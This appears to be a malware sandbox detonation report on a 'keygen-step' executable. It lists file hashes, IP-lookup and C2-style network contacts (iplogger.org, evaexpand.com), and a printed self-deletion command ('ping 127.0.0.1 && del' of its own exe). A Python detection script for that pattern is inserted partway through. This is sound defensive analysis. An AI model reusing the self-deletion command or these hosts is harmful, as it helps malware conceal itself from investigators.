C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 76ad364c071795e8b6fc0b3aff8269e1
SHA1 5b8fb20fa90bb888e391c7de497db1cf191cebcc
SHA256 51fdedfc60c1d3d2e35464730ab62687d4a60a61c50585c27f5d8e924b5a7dda
SHA512 62c70ace52e29e1acb16057b6793224f4323a681068df85c050158158f5ccdbfaeb4ec9949adca72847ab9a5bf4cb1bff105fc827cd2e4d2114c587f0d7ced12

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 3ef9e2341185bec0c8e28edb71cb99f4
SHA1 dfad98e3e8acf9ad118893d3df08bedfcf624ff0
SHA256 be4ad11d94fae014b130ab8920e6aa1721d7d0e14430ae37143c49e7aa432656
SHA512 5cecf5522dc3320fee47f3ec388b4c2b57679ad110388bed3f69e4598167d178e9f0de1ef39a3b414d9370f55144546b569c399d0e31d1e3792dc5638fecea08

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 52284ab79ce0eeb3c90042ab6855e970
SHA1 305bf99234fdd6eddbfe99f0442e4dea448ffbab
SHA256 23bb05ad23d4ffb49251d47033d9f7f2734fe9e7d242fa8e81328598d7c383e2
SHA512 92d79090e2d82d387a0ce08e9298d053b3679d850eb6cf9971c5c657a4c9eb9f8afacf930c48aa58a9f6a2aa04cedffb26c98607e07a42ee2a714a1a5eb46e24

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 57ea81cd632caed424a9e7e35f7fe0a7
SHA1 454a6d74e693adfc5b2d9ff25b555abb57df1043
SHA256 5ace4f7eb57f28349178e12b9b6342ac3113e085ef3ab3f0e4eab391845c0757
SHA512 3d0e7dc07f5e939d82eb25f6f142735ffac0e5234dfaffc594a52bc341e581f4ee4d18a322e814bbe6335a510e091a922d1c59547a3ed3650b3066d07565271d

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 16d8c395a5e54ff35e8950785af93112
SHA1 848ccd1cd1128538ad143ae55cbb6d48e3c91d64
SHA256 26160883b9326df451dd0abc8d6f47470cd6a3e350003b6d89147435728d6ea7
SHA512 0486d1bf14b9e58d6be21bdef09e98abc3d8e084eed4314025a4a59bfbc55fec3e13d94c54fa9c7dd2901c4aee07fa43209828dde64af58f0f07207396259318

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.INTEG.RAW

MD5 3976333bf75bbe7b83207471faf22056
SHA1 31874cdfb8e8a54c9d20357fbdf73b5bc9784c6a
SHA256 c21272bb7a988bfdf4cf3864eb9da35f80c523877c464850d455a67f09745ef9
SHA512 a8e30e506e37ecfb9a905b5efe6f300d980ff40096ee66c51fc4f2317b98bdee7d3c1620a0c85aaa1bff73dfe84ca3eb4917e45234aedb3f42a2c50c729c55b9

C:\Users\Admin\AppData\Local\Temp\keygen-step-4\d.jfm

MD5 83a38a48f18c2fdef2bbc144bf4ef6d0
SHA1 6b94568f44a384eadf1daed3e8c1342f2651607b
SHA256 51d9cbbbc92be6caa5ca644ab97ff7e146ac1b5207cb32a82ee8d3c804d2ff73
SHA512 fb23f7e9624f9b42e523b50d6b4e5434faadea0d3f3da55411b56591bad7752efd33b5a02ed7d45a5711b8ea014020cf21a685d327a24bafb71b44ccf1c42989

memory/4852-505-0x0000000000400000-0x0000000000667000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-10 13:01

Reported

2024-11-10 13:04

Platform

win10v2004-20241007-en

Max time kernel

95s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | iplogger.org | N/A | N/A
N/A | iplogger.org | N/A | N/A
N/A | iplogger.org | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1
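The process tree above is the classic ping-delay self-deletion: keygen-step-6.exe spawns cmd.exe with `/c ping 127.0.0.1 && del "<its own path>" >> NUL`, where the loopback ping is a short sleep that lets the parent exit before `del` unlinks its image. The detection below is an added example, not part of the sandbox report. It runs over constructed process-creation events modelled on the Processes section (the PIDs and the benign "installer" row are hypothetical) and only reports a hit when the path passed to `del` is the image of the process that spawned cmd.exe, which keeps ordinary "ping && del logfile" scripts out of the results.

```python
"""Detect the ping-delay self-deletion pattern from the behavioral18 process tree.

The events below are constructed for this example (PIDs are hypothetical)
and are not the sandbox's own data.
"""
import re

# Constructed process-creation events: (pid, ppid, image, command_line)
EVENTS = [
    (4156, 1000, r"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"'),
    (4320, 4156, r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del '
     r'"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL'),
    (4332, 4320, r"C:\Windows\SysWOW64\PING.EXE", r"ping 127.0.0.1"),
    # Benign noise (hypothetical): an installer script that waits, then removes its log.
    (5001, 900, r"C:\Windows\System32\cmd.exe",
     r'cmd.exe /c ping -n 3 127.0.0.1 && del "C:\Temp\install.log"'),
]

# "ping" followed somewhere by a loopback target: a sleep substitute.
PING_DELAY_RE = re.compile(r"\bping(?:\.exe)?\b.*?\b(?:127\.0\.0\.1|localhost)\b", re.IGNORECASE)
# "del" followed by a quoted or bare path.
DEL_RE = re.compile(r'\bdel\b\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def is_ping_delay_delete(cmdline):
    """True if a command line both sleeps via a loopback ping and deletes a file."""
    return bool(PING_DELAY_RE.search(cmdline) and DEL_RE.search(cmdline))


def find_self_deletion(events):
    """Return (cmd_pid, parent_image) for cmd.exe children whose ping-then-del
    command removes the image of the process that spawned them.

    Correlating with the parent's image, rather than matching strings alone,
    separates self-deletion (T1070.004) from scripts that delete other files.
    """
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    hits = []
    for pid, ppid, image, cmd in events:
        if not image.lower().endswith("\\cmd.exe") or not is_ping_delay_delete(cmd):
            continue
        m = DEL_RE.search(cmd)
        deleted = (m.group(1) or m.group(2)).strip().lower()
        parent = by_pid.get(ppid)
        if parent and parent[1].lower() == deleted:
            hits.append((pid, parent[1]))
    return hits


if __name__ == "__main__":
    for pid, victim in find_self_deletion(EVENTS):
        print(f"cmd.exe pid {pid} deletes its parent image {victim} (T1070.004)")
```

On a real endpoint the same logic applies to Sysmon Event ID 1 or EDR process-start telemetry: the string pattern alone is noisy, the parent-image correlation is what makes it a high-confidence signal.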

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.102:443 evaexpand.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 102.9.200.195.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/4156-0-0x0000000002A70000-0x0000000002A88000-memory.dmp